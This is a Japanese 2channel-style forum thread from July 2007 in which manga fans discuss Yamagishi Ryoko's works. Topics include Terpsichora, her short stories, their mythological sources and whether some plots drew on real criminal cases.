584 :花と名無しさん:2007/07/21(土) 01:34:07 ID:???O
>>581
読んで検討してみる。オカルトばかり描いてるわけじゃなかったのか。
ちょっと画力でねじふせすぎな面があるが、
諸星大二郎作品は好きだ。

585 :花と名無しさん:2007/07/21(土) 01:35:48 ID:???0
千花六花が持っていたのはPHSじゃなくケータイだよね?
PHSは今でも持っている人ごく一部いるかもしれないけど。

586 :花と名無しさん:2007/07/21(土) 01:43:20 ID:???0
>>585
phsってごく一部しか使ってないの?
わたしずっとphsだけど…(笑)

587 :花と名無しさん:2007/07/21(土) 01:53:45 ID:???O
二人の持ってるのはケータイでしょうね。
このごろ千花ちゃんのケータイが繋がらない、って台詞あったような。

時代にある物は適度に描きつつ、過度に流行モノは取り入れず、
画力があれば、後から読んでもあまり古く感じないね。
YAWARA!とかスラムダンクとか、今でも普通に読めるしね。

588 :花と名無しさん:2007/07/21(土) 02:20:12 ID:???O
ピッチって今年でなくなるんでしょ?
ドコモも撤退っつーか仕事たたむから。

589 :花と名無しさん:2007/07/21(土) 02:22:11 ID:???O
>>570
ルーズ最盛期って十年くらい前かな?
今は誰も履いてないよね。

590 :花と名無しさん:2007/07/21(土) 02:41:53 ID:???O
ファッションで、最先端、かつ大流行したものは古く感じるな、なんか。
電化製品は美内すずえが言うとおり、小物として外せないから仕方がないにしても、
ファッションは流行取り入れすぎると古くなってしまうんだね。



591 :花と名無しさん:2007/07/21(土) 03:10:07 ID:???0
>>588
ウィルコムの独占になるんじゃないの

592 :花と名無しさん:2007/07/21(土) 08:28:57 ID:???O
>>577
藤子F不二夫は?

593 :花と名無しさん:2007/07/21(土) 08:35:05 ID:???0
>>582
諸星漫画は流行どころじゃなくて、
もうモロボシ宇宙というしかないほど、世界が確立してるんですよ。
読み手は選ぶだろうけど、ハマる人は崇拝者になるだろうなぁ。

594 :593:2007/07/21(土) 08:53:14 ID:???0
生物はモロボシ系統樹で進化し、
物事はモロボシ因果律によって生じる。
一言で言うと、妖怪と宇宙が同じ地平に存在してるってカンジw

595 :花と名無しさん:2007/07/21(土) 09:32:52 ID:???0
>>564
http://ja.wikipedia.org/wiki/%E6%9D%B1%E4%BA%AC%E3%83%BB%E5%9F%BC%E7%8E%89%E9%80%A3%E7%B6%9A%E5%B9%BC%E5%A5%B3%E8%AA%98%E6%8B%90%E6%AE%BA%E4%BA%BA%E4%BA%8B%E4%BB%B6

埼玉県入間川

ギシ先生は時事ネタがお好きだから
原発問題
ロス疑惑
上智大生刺殺事件

596 :花と名無しさん:2007/07/21(土) 10:21:45 ID:???0
>>565
どらえもんに出てくるんですよ。
ルックスは>>563のとおり。まさにこの場面、この絵が記憶にあります。
私はコミックでよんでるので、相当昔に出てるやつです。
アニメ版に登場してるかどうかは不明。

597 :花と名無しさん:2007/07/21(土) 10:40:45 ID:???0
>>596
アニメ版には新ドラの方にもとっくに出ていますよ。
「あやうしライオン仮面」の回。珍しくドラえもん主役で
タイムパラドックスをテーマとしたなかなか面白い回です。
フニャコフニャオ先生w

598 :花と名無しさん:2007/07/21(土) 10:41:31 ID:???O
>>592
短編が多いし作品によるかな、古き良きSF、という感じはややあるけど
今読んでも楽しめるものは多いし、個人的には大好き。
つーか、ここ少女漫画板ー!少年漫画守備範囲外だよ…。

599 :花と名無しさん:2007/07/21(土) 11:46:55 ID:???0
>>595
>上智大生刺殺事件
を元にした作品てなんてやつ?

600 :花と名無しさん:2007/07/21(土) 11:53:53 ID:???O
ここはギシスレ
名物料理は前進守備

モロの漫画は古いどころじゃねーな
うちにもあるけど、読むと手に毒がつきそうでちりかみが必要な感じ

601 :花と名無しさん:2007/07/21(土) 11:59:51 ID:???0
>>599
メディア

私は上智が元だとは思わないけど・・・
上智の女子大生のお母さん可哀想じゃん。お母さんが犯人みたいで。

602 :花と名無しさん:2007/07/21(土) 12:00:42 ID:???0
>>575
それはそれで、へー当時はこんなんだったんだーって思えて楽しいけどね。

603 :花と名無しさん:2007/07/21(土) 12:05:07 ID:???0
>>601
メディアなのか…。実際の事件とはかなり違うよね。
未解決の刺殺放火事件のことでしょ?

604 :花と名無しさん:2007/07/21(土) 12:16:00 ID:???0
ロス疑惑をモデルにしたのはどの話?

605 :花と名無しさん:2007/07/21(土) 12:21:37 ID:???O
ロス疑惑って何?

606 :花と名無しさん:2007/07/21(土) 12:23:51 ID:???0
三浦カズ

607 :花と名無しさん:2007/07/21(土) 12:44:20 ID:???0
>>604
雨女
これはホラーとして出色だと思う
ロス疑惑自体はどうも捏造真実入り乱れてgdgdだけど。

>>598
でも凄い時代を先取りしてるネタ取り多いな
SFじゃないが「毎日が日曜日」とか、
牛が人を家畜として飼ってるやつとか…

608 :花と名無しさん:2007/07/21(土) 13:07:28 ID:???O
>>607
ミノタウロスの皿かな?

まあ当時はちょっとああいう思想が流行ったけどね。
ベジタリアンとかグリーンピースのはしりね。
そこまで思想的に言いたい訳じゃないと思うけど、風刺は効いてるね。

609 :花と名無しさん:2007/07/21(土) 13:09:05 ID:???0
三色すみれってどんな話でしたっけ?

610 :花と名無しさん:2007/07/21(土) 13:10:46 ID:???O
>>602
松本零次とか竹宮恵子とか石森のSF観も、それはそれで面白いよね。

611 :花と名無しさん:2007/07/21(土) 13:11:54 ID:???O
>>600
「古い本には、毒がしみこんでるような気がして気になる」
「おまえ、そういう感じがするわけ?」
「おまえしないの?」
「うっどうだろう…」
ハムテルはちりかみで…

動物のお医者さんですねww

612 :花と名無しさん:2007/07/21(土) 13:22:33 ID:???0
>>608
それだ。
確かにその辺りの思想+ブラックジョークだな。

けど食べられる女の子の問い掛けに言葉に詰まった主人公と同じく
ちゃんと答えられる人は今だにいないだろう、ってとこが色褪せない。

613 :花と名無しさん:2007/07/21(土) 13:26:27 ID:???O
>>609
血筋でつながる三話オムニバス
・貴族の家に引き取られたけど立場上恋を諦めなければならない娘の話
・高慢な美女の話
・コールガールの話

コールガールの話の元ネタはティファニーで朝食を

614 :花と名無しさん:2007/07/21(土) 13:30:37 ID:???0
>>613
読んだはずなのに1話しか覚えてないのは何故だろう
1話は山岸さんには珍しいタイプのオーソドックスな作品だったからか

いや単に温室に捨てられていた養女、貴族、ひらひらドレス
そういうのが子供心に憧れだっただけかw

615 :花と名無しさん:2007/07/21(土) 13:34:16 ID:???O
三色すみれ、ってタイトルと絵が好き。
きっとこういうドレスものも好きなんだと思う。
最近先生のデビュー前の作品のフィレンチェを手に入れたんだけど、
これはドレスでベルばらみたいな世界でした。
結局編集さんに、今の時代はこういうのはNO
と言われて、いかなかったけど。

616 :花と名無しさん:2007/07/21(土) 14:10:52 ID:???O
>>614
>山岸さんには珍しい
でも今考えるとあのおとなしくかわいく
内心は情熱的なのを押し殺す主人公はギシマン主人公の王道
彼女が好きだった人と結婚することになる
明るく眩しい令嬢が決して嫌な女じゃないところも

617 :花と名無しさん:2007/07/21(土) 14:25:34 ID:???0
三色すみれって絵きれいだよね〜。カラーで見てみたい。

618 :609:2007/07/21(土) 14:37:23 ID:???0
皆さんありがとう。
読みたいんだけどあんまり収録されてないなあ。。。

619 :花と名無しさん:2007/07/21(土) 14:44:27 ID:???0
>>618
ここ読んでてもう一度読みたくなったけど
文庫だと未収録なのかな?

そういう自分は何で読んだんだろう
「ひいなの埋葬」に同時収録されてたんだっけ?

620 :609:2007/07/21(土) 15:07:26 ID:???0
>>619
ひいなの埋葬には載ってるみたいですね。
昔の短編、読んでみたいのいろいろあるけど手に入りにくいのも多いなあ。
そろえるにはお金がかかりそう…。

621 :花と名無しさん:2007/07/21(土) 16:29:31 ID:???O
ひいな自体なかなか売ってないんだもん(´・ω・`)

622 :花と名無しさん:2007/07/21(土) 16:37:47 ID:???0
うちの近くの図書館にはギシ先生の短編集
結構な数置いてるんだけど
図書館くらいしか入手は難しいのかな?
できれば手元に置きたいんだけど。

623 :花と名無しさん:2007/07/21(土) 18:24:00 ID:???0
三色すみれを雑誌掲載時にリアルで読んだ婆が通りますよ〜
山岸さんは、あの頃からカラーの色使いが
独特な方向に行き始めたような気がする。
アラベスク第2部のころ、水野英子さんが
「山岸氏の色使いは昔だったらありえない(編集が許さない)」と
マンガ論でこぼしてたのを思い出す。

624 :花と名無しさん:2007/07/21(土) 20:04:04 ID:???0
>>607
お得意の幽霊話としていいけど
疑惑の銃弾の影響を受けすぎ

625 :花と名無しさん:2007/07/21(土) 21:12:47 ID:???0
>>623
ナカーマ!
あの色使いは本当に独特で忘れがたい美しさだった。

626 :花と名無しさん:2007/07/21(土) 21:22:18 ID:???0
いいなあ。初め読んだときは三つのエピソードのつながりに気付かなかった・・

627 :花と名無しさん:2007/07/21(土) 21:30:17 ID:???O
二話目の美女の話もヘレネーやドリームにつながっていく超美女だったような。。
あと三話めのラストの蝶の羽をつけた点描主人公の飛んでるポーズが
すごくかわいかった記憶

628 :花と名無しさん:2007/07/21(土) 21:42:53 ID:???0
>626ナマカ!
2話は時代をさかのぼるということに
気づいたのはちょっと大きくなって読み返したとき
あ、1話の肖像画の人の話だったのかぁ〜と。
そんで3話の、おじいさまには他に好きな人がいて…のエピが1話に繋がってると
初めて気づいた時は目が覚めたようだったわw
当時は雑誌も時々しか買ってもらえなかったから
3〜4年は保存しててよく読み返したものだった。

629 :花と名無しさん:2007/07/21(土) 22:15:15 ID:9rAipkqL0
>>619
三色すみれは
花とゆめコミックスの「ひいなの埋葬」
ロマンコミック自選全集「シュリンクス・バーン」(主婦の友社)
あと角川の全集の「愛天使」に収録されてるからけっこう見れるよ。
文庫はないけど全集なら手に入りやすいんじゃない?

630 :花と名無しさん:2007/07/22(日) 01:28:52 ID:???O
セイレーンてどんな話だったっけ…
スピンクスやウンディーネやハーピーは覚えてるのに。

631 :花と名無しさん:2007/07/22(日) 01:40:47 ID:???O
ヒント1
セイレーンはギシ先生が、「男性の皆様ごめんなさい!」と言っていたのが印象的な作品です。



632 :花と名無しさん:2007/07/22(日) 01:42:50 ID:???O
ヒント2
コブラへとつながります。

633 :花と名無しさん:2007/07/22(日) 01:45:02 ID:???O
>>625
いいですねぇ。
リアルで読んでたなんて羨ましい。
あの頃のカラーは、アルフォンス=ミュシャの影響があり、とても好き。


634 :花と名無しさん:2007/07/22(日) 01:47:29 ID:???O
>>611

>>600
> 「古い本には、毒がしみこんでるような気がして気になる」
> 「おまえ、そういう感じがするわけ?」
> 「おまえしないの?」
> 「うっどうだろう…」
> ハムテルはちりかみで…

> 動物のお医者さんですねww

635 :花と名無しさん:2007/07/22(日) 01:53:27 ID:???O
↑なんか間違えて引用しちまった
スルーしてくんろ

636 :花と名無しさん:2007/07/22(日) 02:35:15 ID:???O
セイレーンはカーチャンの髪が水面八方に広がってる様子と
カーチャンの腰につかまって二人でごぼごぼ沈んでいくところの
水中図がかっこよかった

637 :花と名無しさん:2007/07/22(日) 02:40:18 ID:???0
セイレーンのカメラマンのモデル(顔等)はデヴィット・ボウイじゃなかったっけ?

638 :花と名無しさん:2007/07/22(日) 02:50:24 ID:???0
ネジの叫びの海草?が絡まったセシル画がこわくてこわくて
もういやだー

639 :花と名無しさん:2007/07/22(日) 02:59:03 ID:???0
上智云々て決定事項のように言って非難する人前からいたけど、何を根拠に言ってるんだろう?
ロスと違って固有名詞そのままとかじゃないし、「留学準備していた女子大生が刺殺」だけだとしたら
根拠が弱すぎる気がするんだけど…
大体あの漫画の展開だと、あの後事件が迷宮入りする(母親がばっくれる)とも思えないし…。

640 :花と名無しさん:2007/07/22(日) 07:36:04 ID:???O
迷宮入りで思ったけど、母親が遺書を残さずに後追いしたら、
あの仲の良かった母娘がなぜ?とマスコミに取り沙汰されたりするんだろうな。
あのフェミ教授も、自論にからめて語りそうだ。

641 :花と名無しさん:2007/07/22(日) 08:14:44 ID:???0
>>639
ヒント:鬼女はゴシップ大好き

642 :花と名無しさん:2007/07/22(日) 08:47:09 ID:???O
>>639
いんだよ細けえことは

643 :花と名無しさん:2007/07/22(日) 10:11:28 ID:???0
>>642
千花乙

644 :花と名無しさん:2007/07/22(日) 11:13:31 ID:???0
>>636
あの場面は印象的だよね
一枚の絵画みたい

しかしナメクジ妖怪といいセイレーンといいスピンクスといい
母親が息子を胎内に取り戻す?というモチーフが好きなのかな

逆に主人公が娘だと胎内に戻そうとする母に反発して
母親と決別していく話が多い気がする

645 :花と名無しさん:2007/07/22(日) 11:49:09 ID:???O
>>644
どっちにしろ「支配する母」のモチーフはギシのテーマなのか
それともその方が少女漫画としてウケるからなのかな。

646 :花と名無しさん:2007/07/22(日) 12:08:42 ID:???0
上智短大出身者ですが、
メディアを初めて読んだ時、母校が舞台なんだなと思った。
ただ、実際の事件とは結びつけなかったなー。

647 :花と名無しさん:2007/07/22(日) 12:21:29 ID:???0
支配する母親もそうだけど、姉妹ものもテーマかもしれない。
タイトルがどうしても思い出せないけれど、姉が美人で妹がブスで
妹が恋をする話が印象的だった。
確か、古典モノと少し絡めて描かれたストーリーだったと思うけど
思い出せない…orz

648 :花と名無しさん:2007/07/22(日) 12:23:33 ID:???0
咲ヤ此花姫みたいなタイトルだったような

649 :花と名無しさん:2007/07/22(日) 12:31:00 ID:???0
>>648
ああああ!有難うございます。
多分そんなタイトルだったと思います。かなり昔に読んだけれど
未だに印象に残っています。

650 :花と名無しさん:2007/07/22(日) 12:43:06 ID:???O
>>646
>メディアを初めて読んだ時、母校が舞台なんだなと思った。

それはどのあたりで?
語学に力を入れているといった描写や四大との配置関係?
それとも校舎などが似ていたのでしょうか?

651 :花と名無しさん:2007/07/22(日) 12:45:30 ID:???0
J短大って名前だからじゃないの

652 :花と名無しさん:2007/07/22(日) 12:48:32 ID:???0
>>649
ごめん、咲くやは妹が美人で姉がブスな設定だった。
姉が美人っていうと常夜長鳴鳥かな

653 :花と名無しさん:2007/07/22(日) 12:51:38 ID:???0
此花佐久屋姫はわりと後読感爽やかでハッピーな話だったね。
でも妹にあそこで抜け出す勇気が無かったら
瑠璃の爪になるんだろうな、とも思う。

654 :花と名無しさん:2007/07/22(日) 12:58:08 ID:???O
>>640
あの仲の良かった姉妹がなぜ?とマスコミが取材していく手法をとったのが瑠璃の爪だよね。
短大の友人の証言:お母さんのお弁当を食べなかったんです。すごく美味かったのに…
とかになりそう。

655 :647:2007/07/22(日) 12:58:15 ID:???0
タイトルを書き込んでくださった方、有難うございます。
内容うろ覚えでどの文庫に収録されていたかも覚えていない
のです。
印象的な台詞があって、「〜のように、私を追い返さないで下さい」
みたいなモノローグがありました。〜の部分に古典の引用が
あったような気が…
ずっと気になっていたので立ち読みのできるブコフで探して、
書店で新品で購入したいと思います。

656 :646:2007/07/22(日) 13:22:52 ID:???0
>>650

>>語学に力を入れているといった描写や四大との配置関係?

まさにそれ。
今本が手許にないのでアレだけど、
四大は都心にあるのに短大は田舎で騙された気分(?)とか、
語学に強いとかの描写で。
学校周囲の様子なんかも、取材したんだなーと思いました。


657 :花と名無しさん:2007/07/22(日) 13:43:13 ID:???0
そういや「瑠璃の爪」ってTVドラマになってて
市原悦子の怪演が怖かったな…。
さいごにモノローグで「無意識の中の悪意を」って流すところとか。

古い話でスマソ

658 :花と名無しさん:2007/07/22(日) 13:48:33 ID:???O
キマイラの田舎のバカ女子大もモデルがあるんだろうか?
全寮制とか私鉄の終点とかやけにリアリティあるけど。

659 :花と名無しさん:2007/07/22(日) 13:55:03 ID:???0
>646
あーなるほど…じゃああながち根拠のない決め付けでもなかったんだね。

660 :花と名無しさん:2007/07/22(日) 13:58:33 ID:???0
>655
それなら「木花佐久夜毘売」だよ。文庫の「月読」に入ってるよ。

661 :650:2007/07/22(日) 14:40:39 ID:???O
>>656
d。なるほどー。
ギシ先生、取材したんだね。さすがに校内は、許可とらないと無理だったのだろう。

662 :花と名無しさん:2007/07/22(日) 15:15:04 ID:???O
>>655
「石長姫のように…」だよ。


ヤマトタケルが姉妹を嫁に差し出されて、姉のイハナガヒメを追い返してコノハナサクヤヒメだけ妻にもらったという神話から。

663 :花と名無しさん:2007/07/22(日) 16:06:10 ID:???0
>>631

少女マンガで初めて男性の072を描いた?

664 :花と名無しさん:2007/07/22(日) 16:07:16 ID:???0
>>653
妹は、圭だっけ、という理解者が現れた点でラッキー。

ずーっと前にこのスレで誰かが言っていた、一家のうちの誰か一人を
スケープゴートにして、家族の和が保たれているケースのような話を思い出した。
姉でも妹でも親の愛情や評価で優位に立ちたいがために、
姉妹(や兄弟)の片割れを問題児、ダメな子扱いし、
親もそれに乗ってしまって、要領の悪い片割れが繊細だったりするとそれでひねくれてしまって、
一層、姉妹のうちの一方はお気に入りの子として扱われ、
もう片方を「困った子」と問題児扱いすることで、家族が団結できるみたいな。
「瑠璃の爪」はまた別の図式だけど。
離婚したもと亭主が少しかっこよかったw

665 :花と名無しさん:2007/07/22(日) 16:08:50 ID:???0
>>656

構内や教室の描写は違うの?

666 :花と名無しさん:2007/07/22(日) 16:14:22 ID:???O
>>662
ヤマトタケルじゃなくて、アマテラスの孫のニニギノミコトだったはず。

667 :花と名無しさん:2007/07/22(日) 16:24:04 ID:???0
>>664
典子の「チルヤ」にちょっとそういう屈折感があったね。
でも、家族でちょっとそういう目に遭うことで、、
「自分の力や能力で生きていこう」とする意識や
親の愛の多い少ないや比較意識に依存せずに生きていく力が養われたりすることもあるかも。
逆に、潰されたり、周囲の愛や評価への飢餓感→依存が強まる人もいるだろうけど。

668 :花と名無しさん:2007/07/22(日) 16:47:15 ID:???0
六花たんはどうなるかな。
これまでは、期待されないで萎縮している状態から、自分の道を見つけている。
そして、カラボス、白鳥、とやりたい事がある時は、
しっかり自分の意志を貫いているw
くるみ割の経験から、周囲と比べてどうとかそういったことを気にする
状態を克服し、もっと本質的なことに向かって精進することを学んだ。
だけど今度は、姉の存在を背負うことになるからな。
千恵子さんは、千花の件で学習して、娘を押しつぶすことはないだろう。

669 :花と名無しさん:2007/07/22(日) 16:49:25 ID:???O
>>667
奈落の妹なんてほんっとうに姉は姉は姉はでひとかけらも自分がなく、
同一視が極まって精神が病んでいく、
対立して殺し合うのと並ぶある意味最悪展開だったね。

670 :花と名無しさん:2007/07/22(日) 16:49:47 ID:???0
>千恵子さんは、千花の件で学習して、娘を押しつぶすことはないだろう。

押しつぶしてはいないだろう。
千恵子はそう思っているかもしれないが

671 :花と名無しさん:2007/07/22(日) 17:16:59 ID:???0
六花ちゃんの後ろに千花ちゃんが重なって・・・見える・・・・!?

672 :花と名無しさん:2007/07/22(日) 17:16:59 ID:???O
>>666
いんだよ細

673 :花と名無しさん:2007/07/22(日) 17:19:02 ID:???0
>>669
「奈落」ってどこに収録されてます?
読んでみたい。


674 :花と名無しさん:2007/07/22(日) 18:17:08 ID:87MjiZRG0
奈落は単品、絶版でなかなか手に入らない…

675 :花と名無しさん:2007/07/22(日) 19:15:33 ID:???O
咲耶といえば、私の小学校のクラスメイトで名前が「咲耶」で、親がどこどこの大学教授、
頭がすごーく良くて、名前が「古事記」から取ってるとかで有名な子がいた。

顔はブスで有名だったんだけど、頭がいいから、地元公立中学には行かずに、
どこかの大学付属に行ってしまってそれきりわからない。

たしか妹ではなく弟がいたんだけど、弟は存在感がなかった。
彼女は今どういう人生を送っているのだろうか…。

先生の漫画読んだら子供に絶対「咲耶」はつけたくないと思った。
てか不吉だよね、「花の散るように寿命が短い」なんて。


676 :花と名無しさん:2007/07/22(日) 19:34:39 ID:???O
>>674
えーそうなんだ。あすかコミクス買った人しか読めないのか。
どっかに入れて出してほしいね

677 :花と名無しさん:2007/07/22(日) 20:19:50 ID:???O
>>669
奈落の場合、母にそっくりなのは本当は妹だけど、
それをないことにして?、母自体が自分のパーフェクト版の姉の方を父親も含めて絶賛してたり、
妹は結構ゆがむよな…ていう設定ではあったと思う
母親の目からしたら、妹は自分のコピーというより、劣化版みたいに見えてたのかも

678 :花と名無しさん:2007/07/22(日) 21:04:02 ID:???O
ママン、姉イコール自分の姿ではないことは自覚してたみたいだけどね。
「この子(姉)は私のこうであったらという望みを
全部かなえて生まれてきたんだわ」とかいってたから。
ただその自分のバージョンアップ版がかわいくて
自分そのままの妹はまるで無視ね。
妹も結構きれいなのに。姉がいなかったらどう育ったかなんて
想像できないくらい自分を殺してたね。

679 :花と名無しさん:2007/07/22(日) 21:21:37 ID:???0
ジュリエットの卵を思い出した

680 :花と名無しさん:2007/07/22(日) 22:02:25 ID:???0
>>639
>上智云々て決定事項のように言って非難する人前からいたけど、何を根拠に言ってるんだろう?

誰も非難していないし
思い込みが激しくてヒステリックで
まるで、まるでギシ先生の漫画の登場人物のような人ですよね

681 :花と名無しさん:2007/07/22(日) 22:30:36 ID:???0
>>680うーん 
別に680さんの発言さしてるんじゃなくて
前に「殺人の理由はあんなんじゃない」とか批判したりしてた人のことじゃないの?

決定事項のように言って、非難する人「前からいたけど」になってるじゃん

682 :花と名無しさん:2007/07/22(日) 22:40:55 ID:???0
真相云々は別にして今じゃ事件ネタ元ってのも中々難しいご時世なのかな。
津山みたいにある程度評価?定まってる事件は別として。

683 :花と名無しさん:2007/07/22(日) 23:05:16 ID:???0
そもそも元ネタだと決定事項にするのはいかがなものかと。>>595みたいに。

元ネタだ、というだけでギシ先生や、その事件の関係者に迷惑かかる
(お母さんが犯人だと思われたり)

似てるけどまったくのフィクションだからねえ。
否定的意見や決定事項のように言うのはやめようよ。

684 :花と名無しさん:2007/07/22(日) 23:08:03 ID:???0
>>682
評価が定まっているというより、事件からどれだけ時間が経っているのかが大事なんだよね。

時間がたてば歴史になるし、関係者にも迷惑かからん。

そういえば漫画に実在の人物を登場させる時って、著作権とかどうなってんのかな?
(SWANには森下洋子さんとか出てたけど・・・)

685 :花と名無しさん:2007/07/22(日) 23:10:48 ID:???0
でもはっきり言って上智短大生?事件と全然内容違うと思うけど。

一部しか一致していないから、お母さんが犯人かもしれないって
思う人、まずいないんじゃないの?

事件では、被害者はお嬢様っぽい可愛らしい人だったし。
漫画ではマニッシュだったから、そこが一致すると誤解される
かもしれないけどね。


686 :花と名無しさん:2007/07/22(日) 23:21:30 ID:???0
>>684
人物を著作権って・・
肖像権とかプライバシーの侵害、名誉毀損ならわかるけど

687 :花と名無しさん:2007/07/22(日) 23:27:00 ID:???0
>>686
あ、そうそう そういうの。
肖像権じゃなくって ・・・
個人が特定される名前を勝手に使うのってダメなんじゃないっけ・・

688 :花と名無しさん:2007/07/22(日) 23:41:18 ID:???0
>>687
「SWAN」の森下洋子は今でいうとこのカメオ出演みたいなもんでしょ
主人公とやりとりをする辺りは
多分取材したんだろうな、と思わせるし

それ以外の実在の外国の振付家とかダンサーに関しちゃ
あれはああいうことが許されてた時代だとしか言えない
今みたいにネットで騒がれたりもしなかったしね




689 :花と名無しさん:2007/07/22(日) 23:53:43 ID:???0
エースを狙えの何とかさんとかどうなの?

ヒロミと試合してアドバイスまでしてた人、
実在のプレーヤーだったよね?
子供心に気になってた。

690 :花と名無しさん:2007/07/23(月) 00:05:13 ID:???O
>>680
>まるで、まるでギシ先生の漫画の登場人物のような人ですよね

私にはあなたもちょっと…
何だろ、まるでが2回も入るからかね
なぜか、ミスドロシィぽい人が浮かんだw

691 :花と名無しさん:2007/07/23(月) 01:33:59 ID:???0
>>685
でもネットのことだからね。。。

ちょっとモチーフにしているのでは?という説

元ネタだ!と決定事項

ギシ先生がそういう説を唱えた 

ということに何時の間にやら されてたりするから。



692 :花と名無しさん:2007/07/23(月) 01:53:02 ID:???0
>>664
「鬼子母神」かしら?

693 :花と名無しさん:2007/07/23(月) 01:54:26 ID:???0
萩尾の「イグアナの娘」思い出した。

694 :花と名無しさん:2007/07/23(月) 01:59:50 ID:???0
イグッ!穴の息子

695 :花と名無しさん:2007/07/23(月) 02:31:07 ID:???0
>>694
さあTDNスレに帰ろう

696 :花と名無しさん:2007/07/23(月) 02:39:13 ID:???O
一巻か二巻のテレプシコーラで
千恵子が空美を見て「金子みたいに素直に喜べない…わたしには千花がいるから?」って言ってたよね
二部では、千花を失った千恵子が、両親を失った空美の里親になるんじゃね?
このくらい斜め上の予想しないとギシストーリーには追いつけないよ
壺井栄みたいなタイトルつきそうだけど気にしないでくれ

697 :花と名無しさん:2007/07/23(月) 03:00:58 ID:???0
>>694は中ちゃん

698 :花と名無しさん:2007/07/23(月) 06:48:26 ID:HjWHwqcw0
テ(ryマダー

いい加減再開して空美ちゃんの悲しい人生を書いてくれよ

699 :花と名無しさん:2007/07/23(月) 08:59:32 ID:???0
第一部が千花編なら第二部は空美編かな

六花が小学校時代いじめを受けていた空美を放置してたのを悔やむ
ようなシーンがあったけど、今度再開した時には、ライバルとして
振付家とダンサーとしていい関係が築けたらいいね

700 :花と名無しさん:2007/07/23(月) 09:17:25 ID:???0
>>696
壺井栄というと...
「二十四の空」とか?w

701 :花と名無しさん:2007/07/23(月) 09:18:50 ID:???0
六花ちゃんも千恵子さんも全く出てこなかったりして。>第二部
ま、空美ちゃんと美智子先生がいれば、ご飯何杯でもいけるからいいけど。

702 :花と名無しさん:2007/07/23(月) 09:24:17 ID:???O
六花のいないテレプシなんて…

703 :花と名無しさん:2007/07/23(月) 09:57:32 ID:???0
「同人誌と表現を考えるシンポジウム」によると
テレプシに幼児性虐待の場面があることを理由に
某大手本屋が全巻店頭から引っ込めようとしたことがあるらしい…

なんつかびっくりした

704 :花と名無しさん:2007/07/23(月) 10:00:45 ID:???0
揚げ足だが、「幼児」ではないよね。つ児童

それに、テレプシ引っ込める前に少コミとか僕妹とか
そういうの引っ込める方が先な気が。

705 :花と名無しさん:2007/07/23(月) 10:39:10 ID:???0
同意。
少コミ系の漫画を何とかしてから、そういうことしてって感じ。
少コミなんて今やポルノ漫画としか思えない…

706 :花と名無しさん:2007/07/23(月) 10:41:17 ID:???O
>>703の表現だと未遂で終わったんだね。とりあえず良かった。
世間的にそういう風潮が主流になってくると、漫画表現も空美みたいなのを出せなくなっていくんだね。

707 :703:2007/07/23(月) 10:49:27 ID:???0
すいません、完全に自分の読み違いだった…orz

シンポジウムでは児童ポルノ法の話をされていて、
それがアニメや漫画にも適応されるかも…という噂があったときに
大手書店が「ベルセルク」を全部引っ込めた、と
(自分は読んでないんだけど「ベルセルク」に児童虐待の場面があるらしい)

で、その流れで「これがまかり通るのならテレプシも駄目になる」という
シンポジウムの参加者の方が発言されているのを
自分が誤読したんです

あー恥ずかしい、すいません



708 :花と名無しさん:2007/07/23(月) 10:55:15 ID:???O
なるほどね了解。
ベルセルクは確か、主人公ガッツ(ひでー名前だ)がチビッコのころ、すごい勢いでレイプされた描写がある。
ファンタジーではあるけど、あれも戦国時代設定。世紀末ガッツ伝説って感じ。
ストーリーの中において必要があるから残虐描写もあるわけだからね。
性コミ的バカセックルとは話が違うよねー。

709 :花と名無しさん:2007/07/23(月) 12:39:46 ID:???0
ベルセルク。ロスチル編で
父親から暴力と陵辱を受けた少女を描く予定が、
時代が児童ポルノに関してうるさくなったから、
父親が(主に母親を)DVする家庭の少女に
設定変更した、と聞いたことがある。


710 :花と名無しさん:2007/07/23(月) 13:21:08 ID:???O
そういえばこのスレのおすすめ2ちゃんねるに昔ベルセルクスレが入ってたね。
読者かぶってるのかな。

711 :花と名無しさん:2007/07/23(月) 13:45:32 ID:???O
ある意味バレエ戦国時代漫画といえなくもないかも。

>>700
「母の無い子と子の無い母と」とか??

712 :花と名無しさん:2007/07/23(月) 14:15:02 ID:???O
テレプシを四字熟語にすると
盛者必衰
諸行無常
七転八倒
群雄割拠

713 :花と名無しさん:2007/07/23(月) 14:42:58 ID:???O
>>707
ほらねネットや噂ってこういう風に変わっていくんだよね

714 :花と名無しさん:2007/07/23(月) 14:51:42 ID:???0
>>713
イキイキしてますね
おめでとうございます

715 :花と名無しさん:2007/07/23(月) 15:01:13 ID:???0
懐かし漫画版で該当スレがなかったので教えてください。
「妖精王」で本来の姿になったルシフェが漫画の最後あたりで「そうさ 俺が
いい見本だ」と言って登場しますよね?
その後、マブの城は倒壊するわけですが、ルシフェは逃げ出した描写はなかった
ですよね。ルシフェはどうなったんでしょう。

716 :花と名無しさん:2007/07/23(月) 15:29:35 ID:???0
ルシフェは逃げたんじゃね?本来の自分の国に
もう魔力もないからニンフィデアの王になる野望も達成できないし
国に帰っても魔力が戻らなかったらヒッキーになっちゃうかw
マブが亡くなったからひょっとしたら力が戻るかもしれないけど


717 :花と名無しさん:2007/07/23(月) 15:54:08 ID:???0
雨乞いの時、四国がないのはなんで?

718 :花と名無しさん:2007/07/23(月) 15:58:59 ID:???0
四国は大和ではないと…

719 :花と名無しさん:2007/07/23(月) 16:28:56 ID:???O
だって四国って徳川が全国統治するまで別の国だったじゃない。

720 :花と名無しさん:2007/07/23(月) 16:31:50 ID:???O
国のはじめは淡路島なのに?

721 :花と名無しさん:2007/07/23(月) 16:34:03 ID:???O
>>713
伝言ゲームだよね

722 :花と名無しさん:2007/07/23(月) 16:56:25 ID:???0
淡路島は兵庫県でつ オノコロという遊園地がある

723 :花と名無しさん:2007/07/23(月) 17:01:27 ID:???O
>>715-716
逃げた描写も死んだ描写もないからなあ。用済み。
作者が言わない限りわからんのでは。
なんかいろいろとダメになってたし逃げられない気がする。

724 :花と名無しさん:2007/07/23(月) 17:32:57 ID:???0
>>722
阿波路島でググってごらん

725 :花と名無しさん:2007/07/23(月) 18:34:48 ID:???0
>>724
なんか徳島県人の醜さが浮かんできました。

726 :花と名無しさん:2007/07/23(月) 19:13:46 ID:???O
??千花ちゃ〜んタスケテ

727 :花と名無しさん:2007/07/23(月) 19:24:50 ID:???0
いんだよ

728 :花と名無しさん:2007/07/23(月) 20:32:13 ID:???0
>ライバルとして
>振付家とダンサーとしていい関係が築けたらいいね

振り付け家とダンサーならライバルじゃないじゃん

729 :花と名無しさん:2007/07/23(月) 20:42:48 ID:???0
いんだよ

730 :花と名無しさん:2007/07/23(月) 20:55:15 ID:???0
千(ry

